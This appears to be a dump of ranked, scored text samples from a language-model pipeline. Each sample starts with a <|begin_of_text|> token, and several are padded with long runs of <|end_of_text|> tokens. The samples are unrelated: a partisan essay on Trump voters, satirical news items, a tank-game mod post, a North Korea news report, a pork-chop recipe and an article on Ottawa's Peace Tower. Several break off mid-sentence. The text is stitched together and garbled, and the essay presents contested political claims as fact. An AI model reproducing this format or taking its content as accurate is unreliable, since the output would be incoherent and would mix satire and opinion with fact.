Ajmal. Later he wrote: "It's one thing to be hated for deliberately conceding a no-ball and shattering the dreams of millions of cricket fans across the world. It's quite another to suffer the humiliation of having a portly man in an ill-fitting umpire's uniform declare your arm is a bit too bendy." New to Twitter, Amir eventually realised the +================================================================================ +Rank = 79; Score = 7372800.0 +<|begin_of_text|>Janice Fiamengo by + +T + +he election of Donald J. Trump revealed a bitterly divided nation and a large body of voters fed up with the status quo: fed up with a perennially ailing economy and a shrinking middle class; fed up with an overly intrusive state that crippled businesses with innumerable regulations and sought to redistribute wealth; fed up with a massively burdensome and insupportable debt; fed up with a president mentored by revolutionaries and malcontents who seemed not to like ordinary Americans much if at all; fed up with a leader who paid court to hostile foreign powers while alienating or outright betraying America's traditional allies; fed up with a president who spoke of heartland Americans as bitter people who cling to their guns or religion or bigotry; fed up with a president who told business owners "You didn't build that," called the Fort Hood terrorist attack an episode of workplace violence, and announced at the United Nations that the future must not belong to those who slander the prophet of Islam; and most of all, perhaps, fed up with an administration that placed the whole country in thrall to political correctness, making a range of important subjects off-limits for discussion on pain of job loss or public disgrace. Many of these voters felt that America had changed beyond all recognition, had lost its core values, and that neither Republican nor Democrat politicians offered any real resistance to that, or even seemed to notice.Donald Trump promised to change everything: to make America great again; to revive American industry; to put Americans back to work and make it possible for them to feed their families and to have prosperity once again; to reduce burdensome taxes and over-regulation of businesses; to renew American patriotism and the traditional family; to stop pretending that children do just as well without a father and money; to stop pretending that masculinity is toxic; to make it acceptable and normal once more to love God and to celebrate America's Judeo-Christian heritage; to decrease the mass immigration that is changing the face of America for the worse; to root out the Muslim Brotherhood sympathizers who have been given key positions in the American administration; to halt illegal immigration and to put a stop to the sanctuary cities that make a mockery of American laws; to rebuild the American military and to signal American power, not acquiescence, to America's foes; to honor American veterans in a manner appropriate to their service; to renew ties with America's traditional allies; and to vigorously protect America from domestic and foreign terrorism. Perhaps most importantly, he promised to make +================================================================================ +Rank = 80; Score = 7372800.0 +<|begin_of_text|>LOS ANGELES—In anticipation of the release today of 42, the new Jackie Robinson biopic, moviegoers speculated that the film about the first African-American to play major-league baseball in the modern era most likely includes a scene in which a bunch of people yell horrible racist things at him and he’s upset and wants to fight back but he doesn’t. “There’s probably this part where he walks into the stadium for the first time, and everyone’s shouting at him because he’s black and they don’t like that, and he wants to lash out, but then his friend grabs his arm and says, ‘Beat ’em on the field, Jackie,’ and so he just keeps walking,” said local man Clint Harrison, 36, who predicted that the movie might also include a scene in which Robinson wants to give up because everyone’s so mean to him, but then his strong-willed wife consoles him and tells him he needs to keep playing because it’s not just about him anymore. “And at the beginning, all the guys on his team aren’t sure if they like him, but then he plays really, really good and some of them start to like him, and after a while they win a bunch of games, and by the end everybody likes him. Yeah, just like that.” Harrison further conjectured that 42 is probably a bad movie. + +Advertisement<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 81; Score = 7307264.0 +<|begin_of_text|>What happens when two relatively new leaders, both desperate to project strength to their supporters at home, and unskilled in nuanced foreign policy, go head-to-head? Watch US president Donald Trump and North Korean dictator Kim Jong-un over the coming days to find out. + +Trump took to Twitter on Tuesday morning to taunt the North Korean government, saying it was “looking for trouble” and threatening to “solve the problem” (presumably of North Korea’s missile testing) without China. The written attack came after a US aircraft carrier was diverted to the region over the weekend, ahead of the April 15 birthday of North Korea’s founding father, traditionally a time to show off military might. + +www.navy.mil The USS Carl Vinson, recently diverted to the Korean Peninsula. + +The North Korean government, meanwhile, says it is ready for a fight. “If the US dares opt for a military action, crying out for ‘pre-emptive attack’ … the DPRK is ready to react to any mode of war desired by the US,” a North Korean foreign ministry spokesman said on Tuesday. + +Trump kept going later Tuesday, saying in an interview with Fox Business the US was sending “an armada” to the region to challenge Kim that was “very powerful,” and hinting that submarines might be involved too. + +North Korea, a politically isolated dictatorship of 25 million people, has a history of belligerent statements and sometimes fatal skirmishes with neighboring South Korea. The world became used to provocations from North Korea in decades past, but in recent years the threats have increasingly been backed by alarming advances in weapons capabilities that threaten other nations as well. + +“We now have both sides playing at brinksmanship.” + +Introducing Trump’s foreign policy doctrine of provocative statements (sometimes not followed up on) to the already unstable situation is worrisome, foreign policy experts say. “We now have both sides playing at brinksmanship,” said Ken E. Gause, director of the international affairs group at CNA, a defense think tank in Washington, DC. The situation is “very precarious and very concerning.” + +If Trump’s provocative statements are part of a larger, multi-step plan to stabilize and de-nuclearize North Korea, then that is “brilliant,” Gause said. But “if it is just haphazard, it is pretty dangerous.” + +“The default response when North Korea is challenged is to turn up the volume,” said Scott Snyder, the senior fellow for Korea studies at the Council on Foreign Relations. And because North +================================================================================ +Rank = 82; Score = 7241728.0 +<|begin_of_text|>POPULAR + +Historical Models + +Spoiler Video from last week's HB61 + +[DIsclaimer: this HB was the first time we're using arty, the mod changes the way arty works, you can either direct fire, or shoot long range by aiming on the minimap, the satellite arty view has been blacked out] + +Same battle from ISU pov + +This topic contains models created for Historical Battles,Because the emphasis is on usage in HB, models may seem 'unfinished'. For example crash models are unused in HB, so the mods don't contain any.I might fix this in the future, but it's low on the priority list.Any other historical vehicles you'd like to see? Post your suggestions hereWhat are Historical Battles? We run weekly training room events of historical tanks on Sunday evenings. Furthermore, we run games with a realism mod, the 'Historical Realism Mod'.If you're interested in realistic/historical looking models, chances are you'd love HB, sign up for an upcoming battle or read more at: http://forum.worldof...orical-battles/ A picture is worth a thousand words, and 30fps video is.. just watch it: + +Spoiler + +Spoiler + +Spoiler + +Spoiler + +Spoiler + +Spoiler + +Spoiler + +Spoiler + +Spoiler + +Spoiler + +On to the models, because I'm lazy all download links can be found on the mediafire folder found here Hellcat without FoliageModification of Torsys' Hellcat model. Crew have been resized to a more realistic scale, commander has been placed inside the turret, a gunner has been added. Strange foliage camo removed from the engine deck.Hellcat with FoliageSame as above, but with the addition of foliage camoElefantReplaces the ingame Ferdinand with an ElefantPzIII mesh schurzenNew model that adds mesh hull skirts and plate turret skirt to Panzer IIIPzIII plate schurzenSame as above, but using modified plate skirts from Torsys' skirted StuGPzIV schurzen improvedModification of Torsys' PzIV model. Skirts have been added to the stock PzIV turret, and for differentiation, track armour has been added to Schmallturm modelStuGIII schurzen improvedModification of Torsys' StuGIII model. Only change is that the missing hull panel has been fixed.PaK40Replaces the Marder with a PaK40 field gun (not recommended for general use)s +================================================================================ +Rank = 83; Score = 7241728.0 +<|begin_of_text|>Of course Donald Trump over-promised for his first 100 days. What presidential candidate hasn't? + +During last year's campaign, Trump spoke frequently of all the things he would do almost immediately upon entering the Oval Office. He'd repeal Obamacare, reform the tax code, destroy ISIS, build a wall at the U.S.-Mexico border, fix the nation's roads and bridges, take care of veterans, deport criminal illegal immigrants, and much, much more. + +By the last weeks of the campaign, Trump actually dialed back some of his promises. On October 22, he traveled to Gettysburg, Pennsylvania to announce his " Contract with the American Voter," which formalized his pledges for the first 100 days. + +The "Contract" was a single piece of paper. The front listed 18 actions Trump would take under his executive authority as president, and the back listed ten pieces of legislation he would introduce in Congress. + +Now, three months into the Trump administration, the front and the back of the Contract are two very different stories. + +On the executive action front, Trump has kept a significant number of his promises: + +Candidate Trump promised to "begin the process" of selecting a Supreme Court Justice to replace Antonin Scalia. As president, Trump did just that, and Neil Gorsuch is now on the Court. + +Candidate Trump promised to withdraw from the Trans-Pacific Partnership. As president, he did it. + +Candidate Trump promised to require that "for every new federal regulation, two existing regulations must be eliminated." As president, he did it. + +Candidate Trump promised to "lift the Obama-Clinton roadblocks" on the Keystone Pipeline and other infrastructure projects. As president, he did it. + +Candidate Trump promised to "begin removing the more than two million criminal illegal immigrants" in the U.S. As president, he did it. + +On other issues, Trump has kept front-page promises, but with decidedly mixed results. The most significant of those is his pledge to "suspend immigration from terror-prone regions." Trump has done it — twice — only to see his executive orders tied up in the courts. His first try was botched, while the second try will likely survive judicial scrutiny. + +Trump also promised to "cancel all federal funding" for so-called sanctuary cities. He has begun to do so — the Justice Department is beginning to threaten to withdraw some grant money — but the promise was overbroad and will likely never be fully kept. + +In addition, Trump promised to impose a "five-year ban on White House and Congressional officials becoming lobbyists after they +================================================================================ +Rank = 84; Score = 7208960.0 +<|begin_of_text|>Apple Bacon and Blue Cheese Stuffed Pork Chops – thick cut pork chops stuffed with a delicious stuffing made with apples, bacon and blue cheese. + +I’m going through a pork phase again. All I can think of is juicy pork chops and bacon. I think I need to strive for more balance in my meals. I know what I can do, a week of pork chops, a week of salads with bacon, a week of stuffed chicken with bacon, etc. Yeah I think that might work, and I’d say that’s pretty balanced, wouldn’t you? + +But hey, what’s a girl to do when she is faced with pork chops and bacon. Simple, my dears! You stuff the pork chop with the bacon! I bet you didn’t think of that, did you? + +You don’t have to be a man to enjoy thick juicy pork chops stuffed with the most incredible stuffing made with bacon, apples and blue cheese. Can you say flavor bomb? These pork chops will rock your world. Your life will literally be better for having these stuffed puppies! + +But you know this isn’t a novelty, let’s face it, pork and apples go together like chocolate and marshmallows, like Abbott and Costello, like fish and chips, like cream and sugar. I think you get it. Like wisdom and age? Toast and butter? Starsky and Hutch? Heart and soul? Sticks and stones? Peanut butter and jelly? I think I’ll stop here. Nuts and Bolts! Meat and Potatoes! Pen and paper! Salt and pepper! My fav, mac and cheese! I promise, I’m done. + +But when you add bacon and blue cheese, well you’ve elevated the flavors to a whole new dimension. I just love saying that. A whole new flavor dimension. I promise I didn’t have anything to drink, oh maybe just a glass of wine, that’s all. + +Anyway, the stuffing! Simple. Apple. Bacon. Blue Cheese. Shallots. Garlic. Done. + +I used pork loin chops, but the bone in pork chops would work just as well, just make sure that whatever pork chops you use, that they are cut pretty thick, about an inch. Cut a little pocket inside each pork chop, just use a sharp knife, make sure you don’t cut yourself, and then stuff those puppies with all your stuffing, about 1/2 cup of stuffing in each. Doesn’t matter if it sticks out, it’s all good. + +I fried my pork chops on both sides for +================================================================================ +Rank = 85; Score = 7077888.0 +<|begin_of_text|>Heather Lyke will be the first female athletic director at the University of Pittsburgh. + +The University of Pittsburgh has announced Heather Lyke as its new athletic director. Lyke is the director of athletics at Eastern Michigan University, and has been since 2013. Previously, she was the senior associate athletic director at Ohio State University. She was the first woman to hold the position at Eastern Michigan University, and will also be the first female athletic director in history at Pitt. + +The University of Pittsburgh has announced Heather Lyke as its new athletic director. + +Lyke is the director of athletics at Eastern Michigan University, and has been since 2013. + +Advertisement + +Previously, she was the senior associate athletic director at Ohio State University. + +She was the first woman to hold the position at Eastern Michigan University, and will also be the first female athletic director in history at Pitt. + +#Pitt officially announces Heather Lyke as athletic director. Introductory press conference to begin shortly here at the Pete #WTAE #H2P pic.twitter.com/MPOkLpQSIG — Andrew Stockey (@astockeyWTAE) March 20, 2017 + +AlertMe<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 86; Score = 7077888.0 +<|begin_of_text|>The Peace Tower (in French: Tour de la Paix), also known as the Tower of Victory and Peace (in French: tour de Victoire et de Paix),[1] is a focal bell and clock tower sitting on the central axis of the Centre Block of the Canadian parliament buildings in Ottawa, Ontario. The present incarnation replaced the 55-metre (180 ft) Victoria Tower after the latter burned down in 1916, along with most of the Centre Block; only the Library of Parliament survived. It serves as a Canadian icon[2] and had been featured prominently on the Canadian twenty-dollar bill directly adjacent the queen's visage, until the change to polymer. + +Characteristics [ edit ] + +Designed by Jean Omer Marchand and John A. Pearson, the tower is a campanile whose height reaches 92.2 m (302 ft 6 in),[3] over which are arranged a multitude of stone carvings, including approximately 370 gargoyles, grotesques, and friezes, keeping with the Victorian High Gothic style of the rest of the parliamentary complex. The walls are of Nepean sandstone and the roof is of reinforced concrete covered with copper.[4] + +One of four grotesques at the corners of the Peace Tower + +At its base is a porte-cochere within four equilateral pointed arches, the north of which frames the main entrance of the Centre Block, and the jambs of the south adorned by the supporters of the Royal Arms of Canada. Near the apex, just below the steeply pitched roof, are the tower's 4.8 m (16 ft) diameter clock faces,[4] one on each of the four facades. The mechanical workings of the timepiece were manufactured by the Verdin Company and are set by the National Research Council Time Signal. One level below, running around the circumference of the tower's shaft, is an observation deck.[3] This was the highest accessible space in Ottawa until the early 1970s; the Peace Tower dominated the Ottawa skyline, as a strict 45.7 m (150 ft) height limit was placed on other buildings. That limit, however, was later rescinded, leading the Peace Tower to lose its distinction as the city's tallest structure. Cantilevered out at each of the four corners of the tower, at the level of the observation platform, are four 2.5 m (8 ft 4 in) long, 75 cm (2 ft 6 in) +================================================================================ +Rank = 87; Score = 7077888.0 +<|begin_of_text|>Leave some for the rest of us! + +Hey, you can only buy 1 of these. + +No, you're not seeing things. Out of our desperate attempt to be rich love for giving you options, we've added a little something extra for today. Come on in and check it out! + +First, yes, that is a tattoo of a Toshiba Quad-Core Laptop, and second, I refuse to let you shame me for it. + +In fact, it's just one of many tributes to its 8GB memory, 750GB hard drive, and USB 3.0 connectivity inked onto my body. And oh, the stories each one could tell: + +On my left forearm: a picture of my Toshiba surrounded by roses and a banner that says "Mom". + +On my right forearm: a picture of my Mom surrounded by roses and a banner that says "Toshiba". + +Across the front of my neck: QUAD-CORE in Old English script. Lot of bleeding when I got this one. A lot of bleeding. + +On my chest: two majestic bluebirds lifting my Toshiba into Heaven, surrounded by the gleaming rays of a sun whose radiant, smiling visage looks just like Beau Bridges (the truly talented one in that family). I admit, I got this one when I was drunk. + +On my back: exactly like the one on my chest except the Toshiba is wearing a sombrero. I got this one when I was drunk in Tijuana. + +On my right bicep: four open Toshiba laptops laid on their sides and arranged to form an ancient Sanskrit symbol of life and good fortune called a "swastika". + +Right above my left ankle: a little bitty Toshiba with a purple-and-blue butterfly on its screen. You never forget your first Toshiba tat. I got this one when I pledged my sorority. + +Back to top<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 88; Score = 7012352.0 +<|begin_of_text|>SEATTLE—Introducing the latest seasonal drink to its menu, Starbucks announced Monday that the company is now offering a new lukewarm coffee to help ease customers’ transition from iced to hot beverages. “Our new Tepid Roast will be available for a limited time in select cities where temperatures have started to dip between 70 and 60 degrees Fahrenheit,” said spokeswoman Heather Grant, adding that the fairly recently brewed coffee, which has been left sitting out on the counter for a while, is already available at Starbucks locations in several Northern states experiencing weather that’s not warm enough for an iced caffè Americano but also not really chilly enough either to order a hot latte. “In most places, our room temperature coffee will only be around for a couple of weeks while the weather is mild, so we encourage customers to visit their local Starbucks to get one while it lasts.” Officials confirmed that due to the promotion’s early success, the company was already making plans to bring the lukewarm coffee back to Starbucks menus in the spring. + +Advertisement<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 89; Score = 7012352.0 +<|begin_of_text|>YALTA, CRIMEA—In what is being called the worst environmental disaster in the region’s history, millions of policy proposals gushed into the Black Sea on Thursday after a Brookings Institution think tanker ran aground off the coast of Crimea. “Cleanup crews are working around the clock to contain this massive flood of position papers on economics and global development,” said Brookings Institution president Strobe Talbott, adding that booms had been brought to the site to halt the spread of the nonpartisan research while skimmers had been deployed to collect the policy briefs from the ocean’s surface in hopes of preventing currents from dispersing them over a far greater area. “We’re doing our very best to limit the 